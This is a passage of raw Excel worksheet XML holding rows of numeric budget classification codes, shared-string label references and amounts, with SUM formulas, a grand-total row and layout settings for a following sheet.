      <c r="C1199" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1200" spans="1:3">
      <c r="A1200" s="705">
        <v>2210106</v>
      </c>
      <c r="B1200" s="705" t="s">
        <v>1871</v>
      </c>
      <c r="C1200" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1201" spans="1:3">
      <c r="A1201" s="705">
        <v>2210107</v>
      </c>
      <c r="B1201" s="705" t="s">
        <v>1872</v>
      </c>
      <c r="C1201" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1202" spans="1:3">
      <c r="A1202" s="705">
        <v>2210108</v>
      </c>
      <c r="B1202" s="705" t="s">
        <v>1873</v>
      </c>
      <c r="C1202" s="707">
        <v>450</v>
      </c>
    </row>
    <row r="1203" spans="1:3">
      <c r="A1203" s="705">
        <v>2210109</v>
      </c>
      <c r="B1203" s="705" t="s">
        <v>1874</v>
      </c>
      <c r="C1203" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1204" spans="1:3">
      <c r="A1204" s="705" t="s">
        <v>1875</v>
      </c>
      <c r="B1204" s="709" t="s">
        <v>1876</v>
      </c>
      <c r="C1204" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1205" spans="1:3">
      <c r="A1205" s="705">
        <v>2210199</v>
      </c>
      <c r="B1205" s="705" t="s">
        <v>1877</v>
      </c>
      <c r="C1205" s="707">
        <v>1800</v>
      </c>
    </row>
    <row r="1206" spans="1:3">
      <c r="A1206" s="705">
        <v>22102</v>
      </c>
      <c r="B1206" s="706" t="s">
        <v>1878</v>
      </c>
      <c r="C1206" s="269">
        <v>6389</v>
      </c>
    </row>
    <row r="1207" spans="1:3">
      <c r="A1207" s="705">
        <v>2210201</v>
      </c>
      <c r="B1207" s="705" t="s">
        <v>1879</v>
      </c>
      <c r="C1207" s="707">
        <v>6389</v>
      </c>
    </row>
    <row r="1208" spans="1:3">
      <c r="A1208" s="705">
        <v>2210202</v>
      </c>
      <c r="B1208" s="705" t="s">
        <v>1880</v>
      </c>
      <c r="C1208" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1209" spans="1:3">
      <c r="A1209" s="705">
        <v>2210203</v>
      </c>
      <c r="B1209" s="705" t="s">
        <v>1881</v>
      </c>
      <c r="C1209" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1210" spans="1:3">
      <c r="A1210" s="705">
        <v>22103</v>
      </c>
      <c r="B1210" s="706" t="s">
        <v>1882</v>
      </c>
      <c r="C1210" s="269">
        <v>270</v>
      </c>
    </row>
    <row r="1211" spans="1:3">
      <c r="A1211" s="705">
        <v>2210301</v>
      </c>
      <c r="B1211" s="705" t="s">
        <v>1883</v>
      </c>
      <c r="C1211" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1212" spans="1:3">
      <c r="A1212" s="705">
        <v>2210302</v>
      </c>
      <c r="B1212" s="705" t="s">
        <v>1884</v>
      </c>
      <c r="C1212" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1213" spans="1:3">
      <c r="A1213" s="705">
        <v>2210399</v>
      </c>
      <c r="B1213" s="705" t="s">
        <v>1885</v>
      </c>
      <c r="C1213" s="707">
        <v>270</v>
      </c>
    </row>
    <row r="1214" spans="1:3">
      <c r="A1214" s="705">
        <v>222</v>
      </c>
      <c r="B1214" s="706" t="s">
        <v>1886</v>
      </c>
      <c r="C1214" s="269">
        <v>185</v>
      </c>
    </row>
    <row r="1215" spans="1:3">
      <c r="A1215" s="705">
        <v>22201</v>
      </c>
      <c r="B1215" s="706" t="s">
        <v>1887</v>
      </c>
      <c r="C1215" s="269">
        <f>SUM(C1216:C1232)</f>
        <v>151</v>
      </c>
    </row>
    <row r="1216" spans="1:3">
      <c r="A1216" s="705">
        <v>2220101</v>
      </c>
      <c r="B1216" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1216" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1217" spans="1:3">
      <c r="A1217" s="705">
        <v>2220102</v>
      </c>
      <c r="B1217" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1217" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1218" spans="1:3">
      <c r="A1218" s="705">
        <v>2220103</v>
      </c>
      <c r="B1218" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1218" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1219" spans="1:3">
      <c r="A1219" s="705">
        <v>2220104</v>
      </c>
      <c r="B1219" s="705" t="s">
        <v>1888</v>
      </c>
      <c r="C1219" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1220" spans="1:3">
      <c r="A1220" s="705">
        <v>2220105</v>
      </c>
      <c r="B1220" s="705" t="s">
        <v>1889</v>
      </c>
      <c r="C1220" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1221" spans="1:3">
      <c r="A1221" s="705">
        <v>2220106</v>
      </c>
      <c r="B1221" s="705" t="s">
        <v>1890</v>
      </c>
      <c r="C1221" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1222" spans="1:3">
      <c r="A1222" s="705">
        <v>2220107</v>
      </c>
      <c r="B1222" s="705" t="s">
        <v>1891</v>
      </c>
      <c r="C1222" s="250">
        <v>10</v>
      </c>
    </row>
    <row r="1223" spans="1:3">
      <c r="A1223" s="705">
        <v>2220112</v>
      </c>
      <c r="B1223" s="705" t="s">
        <v>1892</v>
      </c>
      <c r="C1223" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1224" spans="1:3">
      <c r="A1224" s="705">
        <v>2220113</v>
      </c>
      <c r="B1224" s="705" t="s">
        <v>1893</v>
      </c>
      <c r="C1224" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1225" spans="1:3">
      <c r="A1225" s="705">
        <v>2220114</v>
      </c>
      <c r="B1225" s="705" t="s">
        <v>1894</v>
      </c>
      <c r="C1225" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1226" spans="1:3">
      <c r="A1226" s="705">
        <v>2220115</v>
      </c>
      <c r="B1226" s="705" t="s">
        <v>1895</v>
      </c>
      <c r="C1226" s="250">
        <v>133</v>
      </c>
    </row>
    <row r="1227" spans="1:3">
      <c r="A1227" s="705">
        <v>2220118</v>
      </c>
      <c r="B1227" s="705" t="s">
        <v>1896</v>
      </c>
      <c r="C1227" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1228" spans="1:3">
      <c r="A1228" s="705">
        <v>2220119</v>
      </c>
      <c r="B1228" s="705" t="s">
        <v>1897</v>
      </c>
      <c r="C1228" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1229" spans="1:3">
      <c r="A1229" s="705">
        <v>2220120</v>
      </c>
      <c r="B1229" s="705" t="s">
        <v>1898</v>
      </c>
      <c r="C1229" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1230" spans="1:3">
      <c r="A1230" s="705">
        <v>2220121</v>
      </c>
      <c r="B1230" s="705" t="s">
        <v>1899</v>
      </c>
      <c r="C1230" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1231" spans="1:3">
      <c r="A1231" s="705">
        <v>2220150</v>
      </c>
      <c r="B1231" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1231" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1232" spans="1:3">
      <c r="A1232" s="705">
        <v>2220199</v>
      </c>
      <c r="B1232" s="705" t="s">
        <v>1900</v>
      </c>
      <c r="C1232" s="250">
        <v>8</v>
      </c>
    </row>
    <row r="1233" spans="1:3">
      <c r="A1233" s="705">
        <v>22203</v>
      </c>
      <c r="B1233" s="706" t="s">
        <v>1901</v>
      </c>
      <c r="C1233" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1234" spans="1:3">
      <c r="A1234" s="705">
        <v>2220301</v>
      </c>
      <c r="B1234" s="705" t="s">
        <v>1902</v>
      </c>
      <c r="C1234" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1235" spans="1:3">
      <c r="A1235" s="705">
        <v>2220303</v>
      </c>
      <c r="B1235" s="705" t="s">
        <v>1903</v>
      </c>
      <c r="C1235" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1236" spans="1:3">
      <c r="A1236" s="705">
        <v>2220304</v>
      </c>
      <c r="B1236" s="705" t="s">
        <v>1904</v>
      </c>
      <c r="C1236" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1237" spans="1:3">
      <c r="A1237" s="705">
        <v>2220305</v>
      </c>
      <c r="B1237" s="705" t="s">
        <v>1905</v>
      </c>
      <c r="C1237" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1238" spans="1:3">
      <c r="A1238" s="705">
        <v>2220399</v>
      </c>
      <c r="B1238" s="705" t="s">
        <v>1906</v>
      </c>
      <c r="C1238" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1239" spans="1:3">
      <c r="A1239" s="705">
        <v>22204</v>
      </c>
      <c r="B1239" s="706" t="s">
        <v>1907</v>
      </c>
      <c r="C1239" s="269">
        <f>SUM(C1240:C1244)</f>
        <v>20</v>
      </c>
    </row>
    <row r="1240" spans="1:3">
      <c r="A1240" s="705">
        <v>2220401</v>
      </c>
      <c r="B1240" s="705" t="s">
        <v>1908</v>
      </c>
      <c r="C1240" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1241" spans="1:3">
      <c r="A1241" s="705">
        <v>2220402</v>
      </c>
      <c r="B1241" s="705" t="s">
        <v>1909</v>
      </c>
      <c r="C1241" s="250">
        <v>20</v>
      </c>
    </row>
    <row r="1242" spans="1:3">
      <c r="A1242" s="705">
        <v>2220403</v>
      </c>
      <c r="B1242" s="705" t="s">
        <v>1910</v>
      </c>
      <c r="C1242" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1243" spans="1:3">
      <c r="A1243" s="705">
        <v>2220404</v>
      </c>
      <c r="B1243" s="705" t="s">
        <v>1911</v>
      </c>
      <c r="C1243" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:3">
      <c r="A1244" s="705">
        <v>2220499</v>
      </c>
      <c r="B1244" s="705" t="s">
        <v>1912</v>
      </c>
      <c r="C1244" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1245" spans="1:3">
      <c r="A1245" s="705">
        <v>22205</v>
      </c>
      <c r="B1245" s="706" t="s">
        <v>1913</v>
      </c>
      <c r="C1245" s="269">
        <f>SUM(C1246:C1257)</f>
        <v>14</v>
      </c>
    </row>
    <row r="1246" spans="1:3">
      <c r="A1246" s="705">
        <v>2220501</v>
      </c>
      <c r="B1246" s="705" t="s">
        <v>1914</v>
      </c>
      <c r="C1246" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1247" spans="1:3">
      <c r="A1247" s="705">
        <v>2220502</v>
      </c>
      <c r="B1247" s="705" t="s">
        <v>1915</v>
      </c>
      <c r="C1247" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1248" spans="1:3">
      <c r="A1248" s="705">
        <v>2220503</v>
      </c>
      <c r="B1248" s="705" t="s">
        <v>1916</v>
      </c>
      <c r="C1248" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1249" spans="1:3">
      <c r="A1249" s="705">
        <v>2220504</v>
      </c>
      <c r="B1249" s="705" t="s">
        <v>1917</v>
      </c>
      <c r="C1249" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1250" spans="1:3">
      <c r="A1250" s="705">
        <v>2220505</v>
      </c>
      <c r="B1250" s="705" t="s">
        <v>1918</v>
      </c>
      <c r="C1250" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1251" spans="1:3">
      <c r="A1251" s="705">
        <v>2220506</v>
      </c>
      <c r="B1251" s="705" t="s">
        <v>1919</v>
      </c>
      <c r="C1251" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1252" spans="1:3">
      <c r="A1252" s="705">
        <v>2220507</v>
      </c>
      <c r="B1252" s="705" t="s">
        <v>1920</v>
      </c>
      <c r="C1252" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1253" spans="1:3">
      <c r="A1253" s="705">
        <v>2220508</v>
      </c>
      <c r="B1253" s="705" t="s">
        <v>1921</v>
      </c>
      <c r="C1253" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1254" spans="1:3">
      <c r="A1254" s="705">
        <v>2220509</v>
      </c>
      <c r="B1254" s="705" t="s">
        <v>1922</v>
      </c>
      <c r="C1254" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1255" spans="1:3">
      <c r="A1255" s="705">
        <v>2220510</v>
      </c>
      <c r="B1255" s="705" t="s">
        <v>1923</v>
      </c>
      <c r="C1255" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1256" spans="1:3">
      <c r="A1256" s="705">
        <v>2220511</v>
      </c>
      <c r="B1256" s="705" t="s">
        <v>1924</v>
      </c>
      <c r="C1256" s="250">
        <v>14</v>
      </c>
    </row>
    <row r="1257" spans="1:3">
      <c r="A1257" s="705">
        <v>2220599</v>
      </c>
      <c r="B1257" s="705" t="s">
        <v>1925</v>
      </c>
      <c r="C1257" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1258" spans="1:3">
      <c r="A1258" s="705">
        <v>224</v>
      </c>
      <c r="B1258" s="706" t="s">
        <v>1926</v>
      </c>
      <c r="C1258" s="269">
        <v>3339</v>
      </c>
    </row>
    <row r="1259" spans="1:3">
      <c r="A1259" s="705">
        <v>22401</v>
      </c>
      <c r="B1259" s="706" t="s">
        <v>1927</v>
      </c>
      <c r="C1259" s="269">
        <f>SUM(C1260:C1269)</f>
        <v>933</v>
      </c>
    </row>
    <row r="1260" spans="1:3">
      <c r="A1260" s="705">
        <v>2240101</v>
      </c>
      <c r="B1260" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1260" s="250">
        <v>680</v>
      </c>
    </row>
    <row r="1261" spans="1:3">
      <c r="A1261" s="705">
        <v>2240102</v>
      </c>
      <c r="B1261" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1261" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1262" spans="1:3">
      <c r="A1262" s="705">
        <v>2240103</v>
      </c>
      <c r="B1262" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1262" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1263" spans="1:3">
      <c r="A1263" s="705">
        <v>2240104</v>
      </c>
      <c r="B1263" s="705" t="s">
        <v>1928</v>
      </c>
      <c r="C1263" s="250">
        <v>50</v>
      </c>
    </row>
    <row r="1264" spans="1:3">
      <c r="A1264" s="705">
        <v>2240105</v>
      </c>
      <c r="B1264" s="705" t="s">
        <v>1929</v>
      </c>
      <c r="C1264" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1265" spans="1:3">
      <c r="A1265" s="705">
        <v>2240106</v>
      </c>
      <c r="B1265" s="705" t="s">
        <v>1930</v>
      </c>
      <c r="C1265" s="250">
        <v>61</v>
      </c>
    </row>
    <row r="1266" spans="1:3">
      <c r="A1266" s="705">
        <v>2240108</v>
      </c>
      <c r="B1266" s="705" t="s">
        <v>1931</v>
      </c>
      <c r="C1266" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1267" spans="1:3">
      <c r="A1267" s="705">
        <v>2240109</v>
      </c>
      <c r="B1267" s="705" t="s">
        <v>1932</v>
      </c>
      <c r="C1267" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1268" spans="1:3">
      <c r="A1268" s="705">
        <v>2240150</v>
      </c>
      <c r="B1268" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1268" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1269" spans="1:3">
      <c r="A1269" s="705">
        <v>2240199</v>
      </c>
      <c r="B1269" s="705" t="s">
        <v>1933</v>
      </c>
      <c r="C1269" s="250">
        <v>142</v>
      </c>
    </row>
    <row r="1270" spans="1:3">
      <c r="A1270" s="705">
        <v>22402</v>
      </c>
      <c r="B1270" s="706" t="s">
        <v>1934</v>
      </c>
      <c r="C1270" s="269">
        <f>SUM(C1271:C1275)</f>
        <v>1948</v>
      </c>
    </row>
    <row r="1271" spans="1:3">
      <c r="A1271" s="705">
        <v>2240201</v>
      </c>
      <c r="B1271" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1271" s="250">
        <v>1723</v>
      </c>
    </row>
    <row r="1272" spans="1:3">
      <c r="A1272" s="705">
        <v>2240202</v>
      </c>
      <c r="B1272" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1272" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1273" spans="1:3">
      <c r="A1273" s="705">
        <v>2240203</v>
      </c>
      <c r="B1273" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1273" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1274" spans="1:3">
      <c r="A1274" s="705">
        <v>2240204</v>
      </c>
      <c r="B1274" s="705" t="s">
        <v>1935</v>
      </c>
      <c r="C1274" s="250">
        <v>225</v>
      </c>
    </row>
    <row r="1275" spans="1:3">
      <c r="A1275" s="705">
        <v>2240299</v>
      </c>
      <c r="B1275" s="705" t="s">
        <v>1936</v>
      </c>
      <c r="C1275" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1276" spans="1:3">
      <c r="A1276" s="705">
        <v>22404</v>
      </c>
      <c r="B1276" s="706" t="s">
        <v>1937</v>
      </c>
      <c r="C1276" s="269">
        <v>358</v>
      </c>
    </row>
    <row r="1277" spans="1:3">
      <c r="A1277" s="705">
        <v>2240401</v>
      </c>
      <c r="B1277" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1277" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1278" spans="1:3">
      <c r="A1278" s="705">
        <v>2240402</v>
      </c>
      <c r="B1278" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1278" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1279" spans="1:3">
      <c r="A1279" s="705">
        <v>2240403</v>
      </c>
      <c r="B1279" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1279" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1280" spans="1:3">
      <c r="A1280" s="705">
        <v>2240404</v>
      </c>
      <c r="B1280" s="705" t="s">
        <v>1938</v>
      </c>
      <c r="C1280" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1281" spans="1:3">
      <c r="A1281" s="705">
        <v>2240405</v>
      </c>
      <c r="B1281" s="705" t="s">
        <v>1939</v>
      </c>
      <c r="C1281" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1282" spans="1:3">
      <c r="A1282" s="705">
        <v>2240450</v>
      </c>
      <c r="B1282" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1282" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1283" spans="1:3">
      <c r="A1283" s="705">
        <v>2240499</v>
      </c>
      <c r="B1283" s="705" t="s">
        <v>1940</v>
      </c>
      <c r="C1283" s="250">
        <v>358</v>
      </c>
    </row>
    <row r="1284" spans="1:3">
      <c r="A1284" s="705">
        <v>22405</v>
      </c>
      <c r="B1284" s="706" t="s">
        <v>1941</v>
      </c>
      <c r="C1284" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1285" spans="1:3">
      <c r="A1285" s="705">
        <v>2240501</v>
      </c>
      <c r="B1285" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1285" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1286" spans="1:3">
      <c r="A1286" s="705">
        <v>2240502</v>
      </c>
      <c r="B1286" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1286" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1287" spans="1:3">
      <c r="A1287" s="705">
        <v>2240503</v>
      </c>
      <c r="B1287" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1287" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1288" spans="1:3">
      <c r="A1288" s="705">
        <v>2240504</v>
      </c>
      <c r="B1288" s="705" t="s">
        <v>1942</v>
      </c>
      <c r="C1288" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1289" spans="1:3">
      <c r="A1289" s="705">
        <v>2240505</v>
      </c>
      <c r="B1289" s="705" t="s">
        <v>1943</v>
      </c>
      <c r="C1289" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1290" spans="1:3">
      <c r="A1290" s="705">
        <v>2240506</v>
      </c>
      <c r="B1290" s="705" t="s">
        <v>1944</v>
      </c>
      <c r="C1290" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1291" spans="1:3">
      <c r="A1291" s="705">
        <v>2240507</v>
      </c>
      <c r="B1291" s="705" t="s">
        <v>1945</v>
      </c>
      <c r="C1291" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1292" spans="1:3">
      <c r="A1292" s="705">
        <v>2240508</v>
      </c>
      <c r="B1292" s="705" t="s">
        <v>1946</v>
      </c>
      <c r="C1292" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1293" spans="1:3">
      <c r="A1293" s="705">
        <v>2240509</v>
      </c>
      <c r="B1293" s="705" t="s">
        <v>1947</v>
      </c>
      <c r="C1293" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1294" spans="1:3">
      <c r="A1294" s="705">
        <v>2240510</v>
      </c>
      <c r="B1294" s="705" t="s">
        <v>1948</v>
      </c>
      <c r="C1294" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1295" spans="1:3">
      <c r="A1295" s="705">
        <v>2240550</v>
      </c>
      <c r="B1295" s="705" t="s">
        <v>1949</v>
      </c>
      <c r="C1295" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1296" spans="1:3">
      <c r="A1296" s="705">
        <v>2240599</v>
      </c>
      <c r="B1296" s="705" t="s">
        <v>1950</v>
      </c>
      <c r="C1296" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1297" spans="1:3">
      <c r="A1297" s="705">
        <v>22406</v>
      </c>
      <c r="B1297" s="706" t="s">
        <v>1951</v>
      </c>
      <c r="C1297" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1298" spans="1:3">
      <c r="A1298" s="705">
        <v>2240601</v>
      </c>
      <c r="B1298" s="705" t="s">
        <v>1952</v>
      </c>
      <c r="C1298" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1299" spans="1:3">
      <c r="A1299" s="705">
        <v>2240602</v>
      </c>
      <c r="B1299" s="705" t="s">
        <v>1953</v>
      </c>
      <c r="C1299" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1300" spans="1:3">
      <c r="A1300" s="705">
        <v>2240699</v>
      </c>
      <c r="B1300" s="705" t="s">
        <v>1954</v>
      </c>
      <c r="C1300" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1301" spans="1:3">
      <c r="A1301" s="705">
        <v>22407</v>
      </c>
      <c r="B1301" s="706" t="s">
        <v>1955</v>
      </c>
      <c r="C1301" s="269">
        <v>100</v>
      </c>
    </row>
    <row r="1302" spans="1:3">
      <c r="A1302" s="705">
        <v>2240703</v>
      </c>
      <c r="B1302" s="705" t="s">
        <v>1956</v>
      </c>
      <c r="C1302" s="250">
        <v>100</v>
      </c>
    </row>
    <row r="1303" spans="1:3">
      <c r="A1303" s="705">
        <v>2240704</v>
      </c>
      <c r="B1303" s="705" t="s">
        <v>1957</v>
      </c>
      <c r="C1303" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1304" spans="1:3">
      <c r="A1304" s="705">
        <v>2240799</v>
      </c>
      <c r="B1304" s="705" t="s">
        <v>1958</v>
      </c>
      <c r="C1304" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1305" spans="1:3">
      <c r="A1305" s="705">
        <v>22499</v>
      </c>
      <c r="B1305" s="706" t="s">
        <v>1959</v>
      </c>
      <c r="C1305" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1306" spans="1:3">
      <c r="A1306" s="705">
        <v>2249999</v>
      </c>
      <c r="B1306" s="705" t="s">
        <v>1960</v>
      </c>
      <c r="C1306" s="250">
        <v>0</v>
      </c>
    </row>
    <row r="1307" spans="1:3">
      <c r="A1307" s="705">
        <v>227</v>
      </c>
      <c r="B1307" s="708" t="s">
        <v>1961</v>
      </c>
      <c r="C1307" s="269">
        <v>4510</v>
      </c>
    </row>
    <row r="1308" spans="1:3">
      <c r="A1308" s="705">
        <v>229</v>
      </c>
      <c r="B1308" s="706" t="s">
        <v>1962</v>
      </c>
      <c r="C1308" s="269">
        <v>5391</v>
      </c>
    </row>
    <row r="1309" spans="1:3">
      <c r="A1309" s="705">
        <v>22999</v>
      </c>
      <c r="B1309" s="706" t="s">
        <v>1825</v>
      </c>
      <c r="C1309" s="269">
        <v>5391</v>
      </c>
    </row>
    <row r="1310" spans="1:3">
      <c r="A1310" s="705">
        <v>2299999</v>
      </c>
      <c r="B1310" s="705" t="s">
        <v>1116</v>
      </c>
      <c r="C1310" s="707">
        <v>5391</v>
      </c>
    </row>
    <row r="1311" spans="1:3">
      <c r="A1311" s="705">
        <v>232</v>
      </c>
      <c r="B1311" s="706" t="s">
        <v>1963</v>
      </c>
      <c r="C1311" s="269">
        <v>4452</v>
      </c>
    </row>
    <row r="1312" spans="1:3">
      <c r="A1312" s="705">
        <v>23201</v>
      </c>
      <c r="B1312" s="706" t="s">
        <v>1964</v>
      </c>
      <c r="C1312" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1313" spans="1:3">
      <c r="A1313" s="705">
        <v>23202</v>
      </c>
      <c r="B1313" s="706" t="s">
        <v>1965</v>
      </c>
      <c r="C1313" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1314" spans="1:3">
      <c r="A1314" s="705">
        <v>2320201</v>
      </c>
      <c r="B1314" s="705" t="s">
        <v>1966</v>
      </c>
      <c r="C1314" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1315" spans="1:3">
      <c r="A1315" s="705">
        <v>2320202</v>
      </c>
      <c r="B1315" s="705" t="s">
        <v>1967</v>
      </c>
      <c r="C1315" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1316" spans="1:3">
      <c r="A1316" s="705">
        <v>2320203</v>
      </c>
      <c r="B1316" s="705" t="s">
        <v>1968</v>
      </c>
      <c r="C1316" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1317" spans="1:3">
      <c r="A1317" s="705">
        <v>2320299</v>
      </c>
      <c r="B1317" s="705" t="s">
        <v>1969</v>
      </c>
      <c r="C1317" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1318" spans="1:3">
      <c r="A1318" s="705">
        <v>23203</v>
      </c>
      <c r="B1318" s="706" t="s">
        <v>1970</v>
      </c>
      <c r="C1318" s="269">
        <v>4452</v>
      </c>
    </row>
    <row r="1319" spans="1:3">
      <c r="A1319" s="705">
        <v>2320301</v>
      </c>
      <c r="B1319" s="705" t="s">
        <v>1971</v>
      </c>
      <c r="C1319" s="707">
        <v>4452</v>
      </c>
    </row>
    <row r="1320" spans="1:3">
      <c r="A1320" s="705">
        <v>2320302</v>
      </c>
      <c r="B1320" s="705" t="s">
        <v>1972</v>
      </c>
      <c r="C1320" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1321" spans="1:3">
      <c r="A1321" s="705">
        <v>2320303</v>
      </c>
      <c r="B1321" s="705" t="s">
        <v>1973</v>
      </c>
      <c r="C1321" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1322" spans="1:3">
      <c r="A1322" s="705">
        <v>2320399</v>
      </c>
      <c r="B1322" s="705" t="s">
        <v>1974</v>
      </c>
      <c r="C1322" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1323" spans="1:3">
      <c r="A1323" s="710" t="s">
        <v>1975</v>
      </c>
      <c r="B1323" s="711"/>
      <c r="C1323" s="342">
        <f>C5+C242+C282+C301+C391+C443+C499+C556+C684+C759+C836+C859+C966+C1024+C1088+C1108+C1138+C1148+C1193+C1214+C1258+C1308+C1311+C1307</f>
        <v>418168</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A4:C1323">
    <extLst/>
  </autoFilter>
  <mergeCells count="2">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A1323:B1323"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="0.393055555555556" bottom="0.393055555555556" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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6"/>
  </sheetPr>
  <dimension ref="A1:P98"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="6" topLeftCell="C7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C19" sqref="C17:C19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="13.2"/>
  <cols>
    <col min="1" max="1" width="13.1481481481481" style="651" customWidth="1"/>
    <col min="2" max="2" width="50.5740740740741" style="652" customWidth="1"/>
    <col min="3" max="3" width="16.1481481481481" style="651" customWidth="1"/>
    <col min="4" max="240" width="9.14814814814815" style="645" customWidth="1"/>
    <col min="241" max="250" width="8.84259259259259" style="645"/>
    <col min="251" max="16384" width="8.84259259259259" style="653"/>
  </cols>
  <sheetData>
    <row r="1" s="645" customFormat="1" ht="21" customHeight="1" spans="1:3">
      <c r="A1" s="654" t="s">
        <v>1976</v>
      </c>
      <c r="B1" s="655"/>
      <c r="C1" s="656"/>
    </row>
    <row r="2" s="645" customFormat="1" ht="66" customHeight="1" spans="1:3">
      <c r="A2" s="657" t="s">
        <v>1977</v>
      </c>
      <c r="B2" s="658"/>
      <c r="C2" s="659"/>
    </row>
